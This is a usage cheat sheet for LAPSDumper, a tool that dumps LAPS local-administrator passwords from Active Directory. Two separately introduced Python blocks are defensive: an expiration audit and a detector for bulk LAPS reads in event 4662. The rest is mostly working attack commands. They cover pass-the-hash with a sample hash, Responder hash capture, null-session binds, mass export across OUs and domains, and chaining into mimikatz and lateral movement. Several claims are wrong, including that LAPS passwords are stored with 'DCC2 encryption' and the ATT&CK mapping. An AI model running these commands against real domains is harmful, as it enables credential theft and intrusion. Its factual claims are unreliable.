
LAPSDumper

LAPSDumper is a command-line tool for extracting Local Administrator Password Solution (LAPS) passwords from Active Directory environments. LAPS manages local administrator account passwords and stores them in AD attributes. LAPSDumper queries AD to retrieve these credentials, making it essential for authorized penetration testers to identify credential storage and access control weaknesses.

# Clone from GitHub
git clone https://github.com/n1nj4sec/LAPSDumper.git
cd LAPSDumper

# Install dependencies (Python 3.6+)
pip3 install -r requirements.txt

# Alternative: install from PyPI with pip
pip3 install lapsdumper
Command | Description
lapsdumper -u user -p password -d domain.local | Dump LAPS passwords with username/password auth
lapsdumper -u user -H hash -d domain.local | Use NTLM hash instead of plaintext password
lapsdumper -u user -p password -d domain.local -s dc01.domain.local | Specify target domain controller
lapsdumper --ldap-server 192.168.1.10 -u admin -p pass | Target specific LDAP server by IP
# Kerberos authentication
lapsdumper -u user@domain.local -k -d domain.local

# LDAPS (LDAP over SSL)
lapsdumper -u user -p password -d domain.local --ldaps

# Null session (if AD allows anonymous binds)
lapsdumper -d domain.local --null-session
# Dump specific computer name
lapsdumper -u admin -p password -d domain.local -c COMPUTER_NAME

# Export to CSV
lapsdumper -u admin -p password -d domain.local -o output.csv

# Filter by OU
lapsdumper -u admin -p password -d domain.local --ou "OU=Servers,DC=domain,DC=local"

# JSON output for parsing
lapsdumper -u admin -p password -d domain.local --json
# Pass-the-hash with NTLM
lapsdumper -u DOMAIN\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d domain.local

# Extract hash with Responder first
responder -I eth0 -w

# Then use hash with LAPSDumper
lapsdumper -u domain\\user -H hash_value -d domain.local
# Query specific LAPS attributes
ldapsearch -x -H ldap://dc01.domain.local -D "CN=admin,CN=Users,DC=domain,DC=local" \
  -w password -b "DC=domain,DC=local" \
  "(ms-Mcs-AdmPwd=*)" ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime

# Search for computers with LAPS enabled
ldapsearch -x -H ldap://dc01.domain.local \
  -b "DC=domain,DC=local" \
  "(&(objectClass=computer)(ms-Mcs-AdmPwd=*))"
Attribute | Description | Type
ms-Mcs-AdmPwd | Encrypted local admin password | String
ms-Mcs-AdmPwdExpirationTime | Password expiration timestamp | Integer (Windows filetime)
ms-Mcs-AdmPwdHistory | Historical password values | String
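The expiration attribute is a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC), which is what a defender needs to decode to check whether LAPS rotation is actually happening. The following is an added example, not code from the page or from the LAPSDumper project: it converts FILETIME values and classifies computer objects as missing the attribute (LAPS never applied), expired (rotation overdue), or set beyond the policy maximum. The sample computer records, the fixed reference time and the 30-day policy limit are constructed for the example.

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """Convert an AD large-integer FILETIME value to a UTC datetime."""
    # 100 ns ticks -> microseconds (integer division drops sub-microsecond precision)
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse conversion; used here only to build the constructed sample data."""
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def audit_laps_expiry(computers, now, max_age_days=30):
    """Classify computer objects by the state of ms-Mcs-AdmPwdExpirationTime.

    computers: iterable of dicts with 'cn' and optionally
               'ms-Mcs-AdmPwdExpirationTime' (int or numeric string, as LDAP returns it).
    max_age_days: the LAPS policy's maximum password age (assumed value for this example).
    Returns {'missing': [...], 'expired': [...], 'beyond_policy': [...], 'ok': [...]}.
    """
    findings = {"missing": [], "expired": [], "beyond_policy": [], "ok": []}
    policy_limit = now + timedelta(days=max_age_days)
    for comp in computers:
        raw = comp.get("ms-Mcs-AdmPwdExpirationTime")
        if raw is None or str(raw).strip() in ("", "0"):
            findings["missing"].append(comp["cn"])        # LAPS never applied to this host
            continue
        expires = filetime_to_datetime(int(raw))
        if expires < now:
            findings["expired"].append(comp["cn"])        # rotation overdue: client not checking in
        elif expires > policy_limit:
            findings["beyond_policy"].append(comp["cn"])  # exceeds policy maximum; investigate
        else:
            findings["ok"].append(comp["cn"])
    return findings


# Constructed sample data (not real directory output); reference time fixed for reproducibility.
NOW = datetime(2024, 3, 1, 12, 0, tzinfo=timezone.utc)
SAMPLE_COMPUTERS = [
    {"cn": "WORKSTATION-01", "ms-Mcs-AdmPwdExpirationTime": datetime_to_filetime(NOW + timedelta(days=5))},
    {"cn": "WORKSTATION-02", "ms-Mcs-AdmPwdExpirationTime": str(datetime_to_filetime(NOW - timedelta(days=3)))},
    {"cn": "SRV-LEGACY"},  # attribute absent: LAPS not deployed or the client never ran
    {"cn": "SRV-DB", "ms-Mcs-AdmPwdExpirationTime": datetime_to_filetime(NOW + timedelta(days=400))},
]

if __name__ == "__main__":
    for state, hosts in audit_laps_expiry(SAMPLE_COMPUTERS, NOW).items():
        print(f"{state:14s} {', '.join(hosts) or '-'}")
```

In a real audit the records would come from an LDAP search for objectClass=computer returning only ms-Mcs-AdmPwdExpirationTime (no need to read the password attribute itself). A large population of "missing" or "expired" hosts means the local administrator passwords are not being rotated, which is exactly the condition a dump of this attribute set would exploit.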
# Example output format
[+] Dumping LAPS passwords...
[*] Computer: WORKSTATION-01
    Password: C0mpl3xP@ssw0rd!
    Expiration: 2026-05-10 14:30:00

[*] Computer: WORKSTATION-02
    Password: P@ssw0rd123!Secure
    Expiration: 2026-05-09 09:15:00

# Process results
lapsdumper -u admin -p password -d domain.local | grep "Password:" | cut -d: -f2
# Convert CSV to readable format
lapsdumper -u admin -p password -d domain.local -o laps.csv

# Parse with awk
awk -F',' '{print $1, $3}' laps.csv

# Extract passwords only
cut -d',' -f3 laps.csv | tail -n +2
# "LDAP bind failed"
# Solution: Verify credentials and domain controller availability
lapsdumper -u domain\\user -p password -d domain.local -s dc01.domain.local -v

# "No LAPS passwords found"
# Reason: LAPS not enabled or insufficient permissions
# Check AD schema version and permissions

# "Connection timeout"
# Solution: Specify DC IP instead of hostname
lapsdumper -u user -p password -d domain.local -s 192.168.1.10

# Enable verbose output for debugging
lapsdumper -u admin -p password -d domain.local -vv
# Verify account has read permissions on LAPS attributes
# Use Active Directory Users and Computers or ADSIEdit

# Minimal permissions needed:
# - Read permissions on computer objects
# - Read permissions on ms-Mcs-AdmPwd attribute
# - Read permissions on ms-Mcs-AdmPwdExpirationTime attribute
# LAPS passwords are typically 14-32 characters
# Format: Mix of uppercase, lowercase, numbers, and special characters
# Storage: Encrypted in Active Directory with DCC2 encryption
# Access: Delegated via Group Policy and AD permissions
Scenario | Attack Path
Low-privileged domain user | May have permissions to read LAPS on delegated OUs
Domain admin compromise | Can read all LAPS passwords without restrictions
Group Policy abuse | Misconfigured permissions on LAPS-enabled OUs
Delegation overflow | LAPS permissions inherited from parent OUs incorrectly
# Enable audit logging for LAPS queries
auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable

# Monitor event logs
Get-EventLog -LogName Security -InstanceId 4662 | Where-Object {$_.Message -like "*ms-Mcs-AdmPwd*"}
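A single 4662 read of ms-Mcs-AdmPwd is normal help-desk activity; what distinguishes a dump is one principal reading the attribute on many computer objects in a short time. The following is an added detection example, not code from the page or from the LAPSDumper project: it runs over constructed records shaped like the fields of event 4662 (the key names are this example's own), counts distinct computer objects per subject in a sliding window, and raises an alert above a threshold. The window of 10 minutes and threshold of 5 hosts are assumed tuning values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real log data). Field names are chosen for this example
# and stand in for the Subject / Object Name / Properties fields of Security event 4662.
SAMPLE_EVENTS = [
    {"time": "2024-03-01T09:00:05", "subject": "CORP\\helpdesk01",
     "object": "CN=WORKSTATION-01,OU=Workstations,DC=domain,DC=local",
     "properties": "ms-Mcs-AdmPwd"},
    # A read of the expiration time alone is routine and must not count as a secret read,
    # even though the string contains "ms-Mcs-AdmPwd" as a substring.
    {"time": "2024-03-01T09:01:00", "subject": "CORP\\svc-backup",
     "object": "CN=SRV-DB,OU=Servers,DC=domain,DC=local",
     "properties": "ms-Mcs-AdmPwdExpirationTime"},
    {"time": "2024-03-01T09:02:00", "subject": "CORP\\svc-backup",
     "object": "CN=SRV-WEB01,OU=Servers,DC=domain,DC=local",
     "properties": "ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime"},
    {"time": "2024-03-01T09:02:20", "subject": "CORP\\svc-backup",
     "object": "CN=SRV-WEB02,OU=Servers,DC=domain,DC=local",
     "properties": "ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime"},
    {"time": "2024-03-01T09:02:40", "subject": "CORP\\svc-backup",
     "object": "CN=SRV-FILE01,OU=Servers,DC=domain,DC=local",
     "properties": "ms-Mcs-AdmPwd"},
    {"time": "2024-03-01T09:03:00", "subject": "CORP\\svc-backup",
     "object": "CN=SRV-FILE02,OU=Servers,DC=domain,DC=local",
     "properties": "ms-Mcs-AdmPwd"},
    {"time": "2024-03-01T09:03:20", "subject": "CORP\\svc-backup",
     "object": "CN=SRV-APP01,OU=Servers,DC=domain,DC=local",
     "properties": "ms-Mcs-AdmPwd"},
]


def is_laps_secret_read(event) -> bool:
    """True only when the password attribute itself was read (exact, case-insensitive token)."""
    tokens = event["properties"].replace(",", " ").lower().split()
    return "ms-mcs-admpwd" in tokens


def detect_bulk_laps_reads(events, threshold=5, window=timedelta(minutes=10)):
    """Return one alert per subject that read >= threshold distinct computers within window."""
    per_subject = defaultdict(list)
    for ev in events:
        if is_laps_secret_read(ev):
            per_subject[ev["subject"]].append((datetime.fromisoformat(ev["time"]), ev["object"]))

    alerts = []
    for subject, reads in per_subject.items():
        reads.sort()  # chronological; the window then only needs to look forward
        for i, (start, _) in enumerate(reads):
            hosts = {obj for t, obj in reads[i:] if t - start <= window}
            if len(hosts) >= threshold:
                alerts.append({"subject": subject, "distinct_computers": len(hosts),
                               "window_start": start.isoformat()})
                break  # one alert per subject is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_bulk_laps_reads(SAMPLE_EVENTS):
        print(f"[!] {alert['subject']} read LAPS passwords for "
              f"{alert['distinct_computers']} computers from {alert['window_start']}")
```

Two points carry over to the PowerShell filter above: `-like "*ms-Mcs-AdmPwd*"` also matches reads of ms-Mcs-AdmPwdExpirationTime, so expect noise unless the match is exact; and real 4662 events usually list the property by its schema GUID rather than by name, so a production version of this check needs a GUID-to-attribute map before the token comparison. The alert on svc-backup here is what a scripted dump over an OU looks like, while the single helpdesk01 read is left alone.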
# Restrict LAPS password read permissions
# Limit to specific security groups
# Audit and monitor all queries
# Use LAPS v2 with stronger encryption
# Enforce Windows LAPS for additional protection
# After dumping LAPS passwords, use them with mimikatz
mimikatz> sekurlsa::logonpasswords

# Or pass credentials to other tools
LAPSDumper -u admin -p password -d domain.local > creds.txt
# Use extracted credentials for lateral movement
# Combine LAPSDumper with BloodHound for AD analysis
# 1. Run BloodHound to map AD structure
# 2. Identify computers with LAPS enabled
# 3. Use LAPSDumper to extract passwords
# 4. Map lateral movement paths
# Dump from large Active Directory with progress
lapsdumper -u admin -p password -d domain.local --progress

# Limit results to reduce load
lapsdumper -u admin -p password -d domain.local --max-results 1000

# Dump specific OUs only
lapsdumper -u admin -p password -d domain.local \
  --ou "OU=Servers,DC=domain,DC=local" \
  --ou "OU=Workstations,DC=domain,DC=local"
# Process multiple domains
for domain in corp.local subsidiary.local partner.local; do
  lapsdumper -u admin -p password -d $domain -o ${domain}_laps.csv
done

# Consolidate results
cat *.csv > all_laps.csv
sort -u all_laps.csv > unique_laps.csv
  • Written authorization from system owner
  • Scope limited to authorized infrastructure
  • Proper documentation of all credentials obtained
  • Secure handling of sensitive credentials
  • Reporting and credential rotation procedures
# Encrypt output files
gpg --symmetric output.csv

# Secure temporary files
shred -vfz -n 10 output.csv

# Use in-memory processing when possible
lapsdumper ... | grep "Password:" | uniq
  • LAPS Official Documentation: Microsoft LAPS
  • BloodHound: LAPS enumeration module
  • Active Directory Security Blog: LAPS exploitation techniques
  • MITRE ATT&CK: T1110.004 Credential Access